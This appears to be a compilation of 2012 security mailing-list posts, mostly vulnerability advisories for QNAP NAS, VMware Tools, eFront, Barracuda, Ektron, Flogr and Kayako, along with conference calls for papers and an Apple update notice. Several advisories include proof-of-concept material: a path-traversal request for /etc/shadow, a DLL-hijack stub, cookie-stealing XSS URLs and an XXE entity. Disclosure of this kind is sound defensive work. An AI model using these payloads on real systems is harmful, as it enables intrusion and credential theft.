QNAP Turbo NAS Multiple Path Injection
** Vulnerability: Multiple Path Injection Product: QNAP Turbo NAS Vendor: QNAP Version affected: = 3.7.3 build 20120801 Status: Unpatched Website: http://web.qnap.com/pro_detail_feature.asp?p_id=202 Discovered by: Andrea Fabrizi Email: andrea.fabr...@gmail.com Web: http://www.andreafabrizi.it ** This vulnerability has been discovered on QNAP TS-1279U-RP, but probably other products that use the same firmware may be affected. The CGI /cgi-bin/filemanager/utilRequest.cgi is prone to a path injection, which makes it possible, for authenticated users, to access, delete o modify any file, included system files, configuration files and files owned by other users. Due to the single user configuration of the embedded linux system, it is possible to access any system file without restrictions (included /etc/shadow, that contains the hash of the administrator password). Vulnerable parameters are (the list is not exhaustive): /cgi-bin/filemanager/utilRequest.cgi [source_file] /cgi-bin/filemanager/utilRequest.cgi?func=delete [file_name] /cgi-bin/filemanager/utilRequest.cgi?func=copy [dest_path] /cgi-bin/filemanager/utilRequest.cgi?func=move [dest_path] /cgi-bin/filemanager/utilRequest.cgi?func=get_acl_properties [name] Sample HTTP request: ### POST /cgi-bin/filemanager/utilRequest.cgi/test.txt HTTP/1.1 Host: 192.168.0.10 Content-Type: application/x-www-form-urlencoded Content-Length: 123 isfolder=0func=downloadsid=12345abcsource_total=1source_path=/myFilessource_file=../../../etc/shadow ###
VMWare Tools susceptible to binary planting by hijack
Security Advisory - VMWare Tools susceptible to binary planting by hijack
=
Summary : VMWare Tools susceptible to binary planting
Date : 4 September 2012
Affected versions : Product versions prior to -
Workstation 8.0.4
Player 4.0.4
Fusion 4.1.2
View 5.1
ESX 5.0 P03
ESX 4.1 U3
Not affected: ESX 4.0, ESX 3.5
CVE reference : CVE-2012-1666
Details
VMWare Tools handles many functions involved with host-guest interactivity,
providing a richer environment for the end-user and server administrators alike.
Part of VMWare Tools responsibilities is handling printer services through host
and is called by a third-party acquired tool (ThinPrint).
During initiation, which occurs during many steps throughout printer comm.
negotiation, a non-existent dynamic-link library is called, resulting in an
unqualified dynamic-link library call to 'tpfc.dll'.
A user with local disk access can carefuly construct a DLL that suits the
pattern that is being traversed by the client and implement it somewhere along
the search path and the client will load it seamlessly.
Impact
After the DLL has been implemented, an unsuspected user that will run printer
services, for example, will cause it to load, resulting in arbitrary code
execution under user's privilege level.
This vector of attack is mainly used in a local privilege escalation scenarios,
user credential harvesting and can be used by malware to disguise itself,
amongst other uses.
Proof of Concept
#include windows.h
int hijack_poc ()
{
WinExec ( calc.exe , SW_NORMAL );
return 0 ;
}
BOOL WINAPI DllMain
( HINSTANCE hinstDLL ,
DWORD dwReason ,
LPVOID lpvReserved )
{
hijack_poc () ;
return 0 ;
}
Solution
Official patches were delivered by vendor and can be fetched from www.vmware.com
Credits
The issue was responsibly reported by Moshe Zioni from Comsec Global Consulting.
Timeline
=
4 September 2012
Security advisory released by Comsec Consulting
31 August 2012
Vendor finished on deploying fixes to products, release notes published
13 March 2012
Vendor started to implement fixes to products
14 February 2012
First response from vendor
13 February 2012
Bug reported by Moshe Zioni from Comsec Global Consulting
to VMWare and third-party printer driver developers in sync
References
=
VMWare
http://www.vmware.com
Release notes
https://www.vmware.com/support/vsphere4/doc/vsp_esxi41_u3_rel_notes.html#resolvedissuessecurity
Comsec Global Consulting
http://www.comsecglobal.com/
IPv6 implications on IPv4 nets: IPv6 RAs, IPv4, and VPN evasion
Folks, draft-gont-opsec-ipv6-implications-on-ipv4-nets has been adopted as an IETF opsec wg item (please see: http://tools.ietf.org/html/draft-ietf-opsec-ipv6-implications-on-ipv4-nets) I was thinking about discussing the following scenario, that I came up with a few days ago: A dual-stacked user (v6 enabled by default) visits an IPv4-only network, and establish his VPN with his office (for mitigating sniffing attacks, etc.). A local attacker sends forged ICMPv6 RAs, thus triggering IPv6 configuration at the victim nodes. If any of the remote nodes the victim is trying to visit is IPv6-enabled, then it's possible/likely that the IPv6 destination address will be used over the IPv4 one. in which case the victim will send his traffic on the local network, as opposed to through the VPN. Assuming the VPN product does not disable local v6 support, and that the VPN does not provide IPv6 connectivity (*), this attack vector could prove to be an interesting one (unexpected, to some extent). (*) even then, this attack might still work. Thoughts? P.S.: Comments on the current version of the aforementioned Internet-Draft will be welcome, too. And yeah, our Twitter is @SI6Networks... Thanks! Best regards, -- Fernando Gont SI6 Networks e-mail: fg...@si6networks.com PGP Fingerprint: 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
eFront Educational v3.6.11 - Multiple Web Vulnerabilities
Title: == eFront Educational v3.6.11 - Multiple Web Vulnerabilities Date: = 2012-08-03 References: === http://www.vulnerability-lab.com/get_content.php?id=666 VL-ID: = 666 Common Vulnerability Scoring System: 3.5 Introduction: = Tailored with larger organizations in mind, eFront Educational offers solutions for the management of companies most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Educational platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Enterprise builds on top of eFront Educational. (Copy of the Vendor Homepage: http://efrontlearning.net/product/ ) Abstract: = A Vulnerability Laboratory Researcher of the Vulnerability Laboratory Team discovered multiple web vulnerabilties in eFront v3.6.11 Educational. Report-Timeline: 2011-08-03: Public Disclosure Status: Published Affected Products: == eFront Product: Educational v3.6.11 Exploitation-Technique: === Remote Severity: = High Details: Multiple persistent input validation vulnerabilities are detected in the eFront Educational v3.6.11 Content Management System. The vulnerabilities allow remote attackers to implement/inject malicious script code on the application side (persistent). The first vulnerability is located in the profile module with the bound vulnerable firstname lastname parameters. The bug allows a low privileged student account to exploit higher privileged trainer or administrator user accounts via registration. Exploitation of the first vulnerability requires low privileged student elearning application user account. The secound vulnerability is located in the Messages - New Folder Name module with the bound vulnerable folder listing. Exploitation of the secound vulnerability requires low privileged student user account is only local exploitable. Successful exploitation of the vulnerabilities can lead to persistent session hijacking (manager/admin) or stable (persistent) context manipulation. Vulnerable Module(s): [+] Profile - User (Administrator User Listing) [+] Messages Vulnerable Parameters(s): [+] Firstname Lastname [+] Foldername Proof of Concept: = The persistent input validation vulnerabilities can be exploited by remote attacker with a privileged student account. For demonstration or reproduce ... Review: Administrator - User Listing (Firstname Lastname) tr id=row_student class=oddRowColor tda href=http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=personaluser=student; class=editLinkspan id=column_studentiframe src=administrator.php-[PERSISTENT INJECTED SCRIPT CODE!])' = d.= (student)= span=/a/td Affected URL(s): http://efront.127.0.0.1:137/educational/www/student.php?ctg=personaluser=studentop=profile http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=users http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=personaluser=studentop=profile Review: Messages - Add New Folder Name - Listing td span class=counter4./span a href=http://efront.127.0.0.1:137/educational/www/student.php?ctg=messages; folder=10iframe src=student-[PERSISTENT INJECTED SCRIPT CODE!])' (0= messages,= 0kb)= a= /td td Risk: = The security risk of the persistent web vulnerabilities are estimated as high(-). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:
eFront Enterprise v3.6.11 - Multiple Web Vulnerabilities
Title:
==
eFront Enterprise v3.6.11 - Multiple Web Vulnerabilities
Date:
=
2012-08-06
References:
===
http://www.vulnerability-lab.com/get_content.php?id=668
VL-ID:
=
668
Common Vulnerability Scoring System:
3.5
Introduction:
=
Tailored with larger organizations in mind, eFront Enterprise offers solutions
for the management of companies most
valued asset - the people. Based on a coherent approach to human capital
management which keeps the workforce actively
engaged, the eFront Educational platform offers the means of aligning learning
programs with business goals to cultivate
employee skills and knowledge associated with business performance. eFront
Enterprise builds on top of eFront Enterprise.
(Copy of the Vendor Homepage: http://efrontlearning.net/product/ )
Abstract:
=
A Vulnerability Laboratory Researcher of the Vulnerability Laboratory Team
discovered multiple web vulnerabilties in eFronts v3.6.11 Enterprise CMS.
Report-Timeline:
2011-07-27: Vendor Notification
2011-08-06: Public Disclosure
Status:
Published
Affected Products:
==
eFront
Product: eLearning Enterprise Edition v3.6.11
Exploitation-Technique:
===
Remote
Severity:
=
High
Details:
Multiple persistent input validation vulnerabilities are detected in the eFront
Enterprise v3.6.11 Content Management System.
The vulnerabilities allow remote attackers to implement/inject malicious script
code on the application side (persistent).
The first vulnerability is located in the Organization Organizational Profile
module with the bound vulnerable Father name
parameter and listing. The bug allows a low privileged trainee account to
exploit higher privileged professor or administrator
user accounts via organisation registration listing. Exploitation of the first
vulnerability requires low privileged trainee
elearning application user account.
The secound vulnerability is located in the Files module with the bound
vulnerable file name listing.
Exploitation of the secound vulnerability requires low privileged trainee
elearning application user account.
The thrid vulnerability is located in the `Write something about yourself`
input message box module with the bound vulnerable
listing. Exploitation of the 3rd vulnerability requires privileged
trainee/professor/admin elearning application user account.
The third issue is only local exploitable because no affected output listing is
available for the vulnerable
`Write something about yourself` application module.
Successful exploitation of the vulnerabilities can lead to persistent session
hijacking (professor/admin), persistent phsishing
attacks or stable (persistent) context manipulation.
Vulnerable Module(s):
[+] Organization Organizational Profile
[+] Files
[+] PANEL Index - Write something about
yourself (Only local exploitable!)
Vulnerable Parameters(s):
[+] Father name [Organisation Listing]
[+] File Name [Listing]
[+] Message - Index [Listing]
Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by remote
attackers with a low privileged trainee account.
For demonstration or reproduce ...
Review: Organization - Organization Profile (Fathername Organisationname)
tbodytrtd class=labelCellFather name: /td
td class=elementCellinput class=inputText name=father value=
[PERSISTENT INJECTED SCRIPT CODE!]) type=text/td/tr
trtd class=labelCellGender: /td
td class=elementCellselect class=inputText name=sex
option value=0 selected=selectedMale/option
option value=1Female/option
/select/td/tr
trtd class=labelCellBirthday: /td
td class=elementCellselect name=birthday[d]
option value=1 selected=selected01/option
option value=202/option
option value=303/option
option value=404/option
option value=505/option
option value=606/option
URL:
http://efront.127.0.0.1:1339/enterprise/www/student.php?ctg=personaluser=traineeop=org_form
Review: Files - File Name [Listing]
tr class=defaultRowHeight evenRowColortd class=centerAlignspan
style=display:none/span
img src=student-Dateien/folder.png alt= title= border=0/tdtdspan
id=span_%2Fvar%2Fwww%2Fvhosts%2F
demo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3Ciframe+src%3Da+[PERSISTENT
INJECTED SCRIPT CODE!]
style=display:none;%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd
%2Fpublic%2F%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]/spana
class=editLink href=javascript:void(0)
onclick=eF_js_rebuildTable($('filename_filesTable').down().getAttribute('tableIndex'),
0, '', 'desc',
Barracuda Web Filter 910 5.0.015 - Multiple Vulnerabilities
Title: == Barracuda Web Filter 910 5.0.015 - Multiple Vulnerabilities Date: = 2012-08-02 References: === http://www.vulnerability-lab.com/get_content.php?id=570 Barracuda Networks Security ID: BNSEC-279/BNYF-5533 VL-ID: = 570 Common Vulnerability Scoring System: 4.5 Introduction: = The Barracuda Web Filter is an integrated content filtering, application blocking and malware protection solution that is powerful, easy to use and affordable for businesses of all sizes. It enforces Internet usage policies by blocking access to Web sites and Internet applications that are not related to business, and it easily and completely eliminates spyware and other forms of malware from your organization. No more productivity loss trying to repair computers or make computers usable again. Blocks access to Web sites based on domain, URL pattern, or content category Blocks downloads based on file type Blocks applications that access the Internet, including IM, music services, and software update utilities Integrates with safe search filters built into popular images search engines Provides integrated gateway and desktop spyware protection Uses Barracuda Web Security Agents compatible with Windows PC’s and Macs to enforce Internet policies on off-network computers The Barracuda Web Filter combines preventative, reactive, and proactive measures to form a complete Web filtering solution. Designed for the enterprise, the Barracuda Web Filter enables you to set up custom policies for particular users and groups across customizable time ranges. The Barracuda Web Filter integrates with popular LDAP directory servers, such as Microsoft Active Directory, for both authentication and group membership information on which to apply custom policies. Sample uses of group policies include: Restricting access to job board Web sites to only the Human Resources group Defining separate policies for teachers and students at a school Enabling compliance officers unrestricted access to the Web for investigation Providing external instant messaging (e.g., AIM) access only to specific users or groups Restricting personal Web browsing to non-working hours For organizations that do not utilize directory servers, policies can be defined for unauthenticated users as a whole, locally defined users and groups, or network IP address ranges. (Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/web-filter-overview.php ) Abstract: = The Vulnerability Lab Research Team discovered multiple Web Vulnerabilities in Barracudas Web Filter Application v5.0.0.015 Appliance Model 910. Report-Timeline: 2012-05-01: Researcher Notification Coordination 2012-05-08: Vendor Notification 2012-06-13: Vendor Response/Feedback 2012-07-25: Vendor Fix/Patch 2012-08-02: Public or Non-Public Disclosure Status: Published Affected Products: == Barracuda Networks Product: Barracuda Web Filter Appliance 910 v5.0.0.015 Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the Barracudas Web Filter Application v5.0.0.015 Appliance Model 910. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action. The vulnerability is located in the NTLM Edit - Host Domain Name which is bound to the affected vulnerable Existing Authentication Services listing. Another vulnerability is located on the upload key tab in combination with the unsanitized short domain name input field + output listing. Vulnerable Module(s): [+] Authentification New Authentication Service [-] NTLM - Server Hostname Domain Name - Existing Authentication Services [+] Authentification Kerberos Advanced Settings [-] Upload Key Tab File in combination with alternative Short Domain Name Picture(s): ../1.png ../2.png Proof of Concept: = The persistent web vulnerabilities can be exploited by remote attackers with high[-](medium+) user inter action or via local low privileged user account with low require user inter action. For demonstration or reproduce ... Review: NTLM Edit Listing td colspan=2 style= valign=top width=285input autocomplete=off id=UPDATE_ntlm_server_hostname: md5UBwQ8iCjrc1egk1wTV8SEg name=UPDATE_ntlm_server_hostname:md5UBwQ8iCjrc1egk1wTV8SEg size=30 value= [PERSISTENT SCRIPT CODE EXECUTION!] type=textbrdiv nowrap=
Ektron CMS - Multiple Vulnerabilities - Security Advisory - SOS-12-009
Sense of Security - Security Advisory - SOS-12-009 Release Date. 05-Sep-2012 Last Update. - Vendor Notification Date. 07-May-2012 Product. Ektron CMS Platform. ASP.NET Affected versions. Ektron CMS version 8.5.0 and possibly others Severity Rating. High Impact.Exposure of sensitive information Exposure of system information System Access Attack Vector. Remote without authentication Solution Status. Fixed in version 8.6 (not verified by SOS) CVE reference. CVE - not yet assigned Details. The web application is vulnerable to multiple security vulnerabilities, such as Unauthenticated File Upload and XML eXternal Entities (XXE) injection. 1.Unauthenticated File Upload: The form /WorkArea/Upload.aspx does not require authentication to upload a file. By issuing a POST request with a webshell embedded in a JPEG image and specifying the ASPX extension it is possible to upload ASPX code to /uploadedimages/. The ASPX code is placed in the comment section of the JPEG so that it survives image resizing. 2.XXE Injection: The XML parser at /WorkArea/Blogs/xmlrpc.aspx is vulnerable to XML external entity attacks which can be used to Scan behind perimeter firewalls or possibly include files from the local file system e.g. !DOCTYPE scan [!ENTITY test SYSTEM quot;http://localhost:22quot;] scanamp;test;/scan Solution. Upgrade to version 8.6 and remove the /WorkArea/Blogs/xmlrpc.aspx file. Discovered by. Phil Taylor and Nadeem Salim from Sense of Security Labs. About us. Sense of Security is a leading provider of information security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application penetration testing firm and trusted IT security advisor to many of the country's largest organisations. Sense of Security Pty Ltd Level 8, 66 King St Sydney NSW 2000 AUSTRALIA T: +61 (0)2 9290 F: +61 (0)2 9290 4455 W: http://www.senseofsecurity.com.au E: i...@senseofsecurity.com.au Twitter: @ITsecurityAU The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-12-009.pdf Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php
KIWICON: THE ANNUCIATION
Dear bugtraq, We the Kiwicon crüe beseech you with our annual CFP If this whole rfc822 mail thing isnt your bag, we put this in a pretag so it was web2.0; https://www.kiwicon.org/the-con/cfp --- KIWICON: THE ANNUCIATION BOOK SIX, CHAPTER ONE 1 In the eighth month the messengers came unto the Crue, and said, Hail, thou art highly favoured, blessed art thou among con organisers. 2 But when the Crue beheld the messengers, they were greatly troubled and perplexed about what manner of salutation this should be. 3 And the messengers said Fear not, Crue, for thou shalt conceive and bring forth a 'con, by name Kiwicon. It shall be great, and will reign over the Wellington Opera House on the seventeenth and eighteenth days of November of this year. 4 And the Crue said How shall this be, seeing as we know not speakers? 5 (an impudent harlot snickered biblically, amirite, but this utterance lowereth the solemnity of the visitation, and she was shushed sternly from the Most High) 6 And the messengers said unto them, Thou shalt make haste, and put out a CFP, and the speakers will come unto thee, yea, unto the very ends of the earth they will come. 7 And the Crue arose, cursing, and pulled out thine fingers. 8 If anyone is able to hear, let them listen, for here is wisdom. Those that hath understanding, let them count the number of the beast; for it is the number of the 'con: and its number is Six. .. .'| . .. . . .|'. | | .'| .'||'. .'| .'| .'| ___ ___ __ | | | || || || || || || || _ ||_ || | | | | | || || || || || | |__|| _\ | || '.| | | || || || || || | | |___| || |'. | | ||__||__|| .. ||__||___\|___/|__| | | | / |.' '.| \ | |/ SIX SIX SIX \| | NEW ZEALAND'S HACKER CON - WELLINGTON 17-18 NOV 2012 | 9 And the Crue opened the first seal and a voice cried out like the tolling of great bronze bells. But yet the voice spake in modern English, because we can't keep this up, saying, You must give a speaker slot to those who will speak of great and wondrous things. Without these people your con will be shit, and everyone will mutter about how much better it was last year, and lo, even the year before that, and the year before that. And you will know shame and hide your faces, because they will be right. 10 The Crue obeyed, and asked the internet to ante up with the good submissions; with wisdom and learning as of the elders of this nation, saving those who speak like the braying of asses and cries of beasts in the wilderness: Thy Name: Thy Country of Residence: The Title: The Length of Thy Parable (not a euphemism): The Shortened Sunday School Version, Possibly With Hand Puppets: Thy Ancestry: 11 Kiwicon 1 begat Kiwicon 2, which begat Kiwicon 3, which begat Kiwicon 4, and it came to pass that Kiwicon 5 was begat from this lineage also, as the Crue willed it, as they are somewhat slow learners. 12 This genealogy proveth that, like its antecedents, Kiwicon 6 will issue forth in a single stream not unlike that of horses. For according to that which thou asked asked for, the talk slots will be given. 13 Gannt charts were given by our Lord to project managers, and whilst smiting these demons with lightning, the Crue accidentally scheduled short-form talks of 5 minutes, which came to be know as Lightning Talks. 14 There is no foolishness in a hacker who spake only five minutes if that hacker hath 5 minutes of content. The fool speaks for one hours length on cyberwar, but drinketh for that day, and for the day following, and the drooling on the person sitting next to them, of which photos were taken. 15 Verily transmitteth your response unto c...@kiwicon.org no later than eighth day October, in this year of 2012. 16 On the twenty fourth day of September, the Crue will proclaim the names of the beasts with the feet of a bear, who haveth submitted early and are rewardeth thus with the fruit of a leopard. 17 (And lo, a digression rose from the sea with ten crowns of blasphemy, and to that beast was given a mouth, to decry that the KJV does get a bit wack all up in revelation, yo) 18 The Crue opened the second seal, and the internet spake, Aren't you guys tired of this thing yet? 'Verily transmitteth', WTF? 19 And the Crue replied, Yea, for lo, this thee and thoust thing is confusing, and we keep having to rewrite it, and now whilst has ceased to look like a real word at all. And those with reading comprehension problems sang out in glorious alleluias. 20 Kiwicon is not the worst computer security conference in .nz.
Cross-Site Scripting (XSS) Vulnerabilities in Flogr
Advisory ID: HTB23110 Product: Flogr Vendor: Flogr Vulnerable Version(s): 2.5.6 and probably prior Tested Version: 2.5.6 Vendor Notification: August 15, 2012 Public Disclosure: September 5, 2012 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2012-4336 CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Risk Level: Medium Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Flogr, which can be exploited to perform Cross-Site Scripting (XSS) attacks. 1) Cross-Site Scripting (XSS) Vulnerabilities in Flogr: CVE-2012-4336 1.1 Input appended to the URL after /index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected website. The following PoC demonstrates the vulnerability: http://[host]/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E/ Successful exploitation of this vulnerability requires that Apache's directive AcceptPathInfo is set to on or default (default value is default) 1.2 Input passed via arbitrary GET parameter to /index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website. The following PoC demonstrates the vulnerability: http://[host]/index.php?[any]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E --- References: [1] High-Tech Bridge Advisory HTB23110 - https://www.htbridge.com/advisory/HTB23110 - Cross-Site Scripting (XSS) Vulnerabilities in Flogr. [2] Flogr - http://code.google.com/p/flogr/ - Flogr is a flexible script that displays your flickr photos in a customizable photo gallery you host on your website. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Cross-Site Scripting (XSS) in Kayako Fusion
Advisory ID: HTB23095 Product: Kayako Fusion Vendor: Kayako Vulnerable Version(s): 4.40.1148 and probably prior Tested Version: 4.40.1148 Vendor Notification: June 6, 2012 Public Disclosure: September 5, 2012 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2012-3233 CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Risk Level: Medium Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge SA Security Research Lab has discovered vulnerability in Kayako Fusion, which can be exploited to perform Cross-Site Scripting (XSS) attacks. 1) Cross-Site Scripting (XSS) in Kayako Fusion: CVE-2012-3233 Input appended to the URL after /__swift/thirdparty/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website. The following PoC (Proof of Concept) demonstrates the vulnerability: http://[host]/__swift/thirdparty/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E Successful exploitation of this vulnerability requires that Apache's directive AcceptPathInfo is set to on or default (default value is default). --- Solution: Upgrade to Kayako Fusion 4.50.1581 More Information: http://wiki.kayako.com/display/DOCS/4.50.1581 --- References: [1] High-Tech Bridge Advisory HTB23095 - https://www.htbridge.com/advisory/HTB23095 - Cross-Site Scripting (XSS) in Kayako Fusion. [2] Kayako Fusion - http://www.kayako.com - Kayako Fusion is the world's leading multi-channel helpdesk solution that enables organizations to deliver a better customer experience and work more effectively as a team, whatever their size. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
[IMF 2013] Call for Papers
Dear all, for your information. Please excuse possible cross postings. CALL FOR PAPERS IMF 2013 7th International Conference on IT Security Incident Management IT Forensics March 12th - 14th, 2013 Nuremberg, Germany Conference Background = Today IT security is an integral aspect in operating IT-Systems. Yet, despite high-end precautionary measures taken, not every attack or security mishap can be prevented and hence incidents will go on happening. In such cases forensic capabilities in investigating incidents in both technical and legal aspects are paramount. Thus, capable incident response and forensic procedures have gained essential relevance in IT infrastructure operations and there is ample need for research and standardization in this area. In law enforcement IT forensics is an important branch and its significance constantly increases since IT has become an essential part in almost every aspect of daily life. IT systems produce traces and evidence in many ways that play a more and more relevant role in resolving cases. Conference Goals The IMF conference provides a platform for experts from throughout the world to present and discuss recent technical and methodical advances in the fields of IT security incident response and management and IT forensics. It shall enable collaboration and exchange of ideas between industry (both as users and solution providers), academia, law-enforcement and other government bodies. Conference Topics = The scope of IMF 2013 is broad and includes, but is not limited to the following areas: IT Security Incident Response - * Incident Response Procedures and Methods * Incident Response Formats and Standardization * Tools Supporting Incident Response * Incident Analysis * CERTs/CSIRTs * Information Sources, Information Exchange, Communities * Dealing with Vulnerabilities (Vulnerability Response) * Monitoring and Early Warning * Incident Response in Non-Standard Environments (e.g. Embedded Systems) * Education and Training * Organizations * Legal and Enterprise Aspects (Jurisdiction, Applicable Laws and Regulations) IT Forensics * Trends and Challenges in IT Forensics * Application of Forensic Techniques in New Areas * Tools and Technology in Procedures for IT Forensics * Methods for the Gathering, Handling, Processing and Analysis of Digital Evidence * Evidence Protection in IT Environments * IT Forensics in Non-Standard Environments (e.g. Embedded Systems) * Source-Determination and Manipulation Detection (e.g. Multimedia Forensics) * Standardization in IT Forensics * Education and Training * Organizations * Legal and Enterprise Aspects (Jurisdiction, Applicable Laws and Regulations) Submission Details == IMF invites to submit full papers of up to 20 pages, presenting novel and mature research results as well as practice papers, describing best practices, case studies or lessons learned of up to 20 pages. Proposals for workshops, discussions and presentations on practical methods and challenges are also welcome. All submissions must be written in English (see below), and either in postscript or PDF format. Submissions must be anonymized. Authors of accepted papers must ensure that their papers will be presented at the conference. Submitted full papers must not substantially overlap papers that have been published elsewhere or that are simultaneously submitted to a journal or a conference with proceedings. All submissions will be reviewed by the program committee and papers accepted to be presented at the conference will be included in the conference proceedings. Submission Guidelines - http://www.imf-conference.org/imf2013/ Language IMF 2013's scope is international hence all submissions must be written in English. Presentations of accepted papers also must be done in English. Publication === Accepted papers will be published by the IEEE Computer Society's Conference Publishing Services. Each participant of the conference will receive a printed copy. Dates and Deadlines === October 15th, 2012: Deadline for submissions December 3th, 2012: Notification of acceptance or rejection December 10th, 2012: Due date for final camera ready copies March 12th through 14th, 2013: IMF 2013 Conference Fees and Registration Information = Information on fees and registration will be available at http://www.imf-conference.org/imf2013/ Conference Chair Felix Freiling
APPLE-SA-2012-09-05-1 Java for OS X 2012-005 and Java for Mac OS X 10.6 Update 10
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 APPLE-SA-2012-09-05-1 Java for OS X 2012-005 and Java for Mac OS X 10.6 Update 10 Java for OS X 2012-005 and Java for Mac OS X 10.6 Update 10 are now available and address the following: Java Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 or later, OS X Lion Server v10.7 or later, OS X Mountain Lion 10.8 or later Description: An opportunity for security-in-depth hardening is addressed by updating to Java version 1.6.0_35. Further information is available via the Java website at http://www.oracle.com/technetwork/topics/security/alert- cve-2012-4681-1835715.html CVE-ID CVE-2012-0547 Java for OS X 2012-005 and Java for Mac OS X 10.6 Update 10 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ For Mac OS X v10.6 systems The download file is named: JavaForMacOSX10.6.dmg Its SHA-1 digest is: 6218979ae4eaef5ea7849cb4455e2c6f8bf362d2 For OS X Lion and Mountain Lion systems The download file is named: JavaForOSX.dmg Its SHA-1 digest is: e0750c72972b8a2ccbcb3144bb31d74419276387 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJQRoIGAAoJEPefwLHPlZEwqLIQAI/iwWUZRJ17R8WepzGdMtOC 7CfvG6Xm4sO56jEz5Idg8elpKaoDr5xzjyBO0PF/I+vM2DJo5X6Dm25r7TstWHVe /Ucnan0yRbn6bqUgsKyAubQy+yENxJEr3ed/xe+EUcRvw8mX/kHH7Rq0boMtxx3D eyq/t8Z4rY3B4BLS0RPG0sKNR2cNetE1yNKxHNskOAc3qsgv8oa7XgR9q+z3lHbS t+BWp3dDF+gcTzdPJVzE1ksC4MCnPYYA6qoNVSj5o8AFU6ZJ5BGaQWIVY67qXZt4 yls0P4bV0LZbrVolrfzpysfgoACT8NutibJ9fWe8UjqN8t+0NvsWKMQIO/Yye4uF aqWUB6P8uzaVEXksIuDuLtLLF0IhdWk7l9wcW9L4h/vgFvcwtT8o7fTn1av7zBhO CP/sF3iM8n50b42m/dD+nkriIlreH7tWMo5C+GgEKaXSgG9YeqnzzCXf30P20wxF oYfpwGgGKrVvojUbuPfZOUe8bpQNoCec8TNtXjZAuOYkE7Ku7RXPeB0Y1znINVNj VXfQcsJlSEjkqS5TYofaNZ3Qk4hVUbexTwuHCMxevY0L1k7PId829wzoPoE70vSw 0BCYAHZzeCkfQpc+jElB8a3rXStYtAvc8OhI2Wq6bLHVclokFSk7YbmrEGDMGM/Z vCB4qLe1cpGMcRIoYGdA =v5mf -END PGP SIGNATURE-
[Rooted CON 2013] CFP starts!
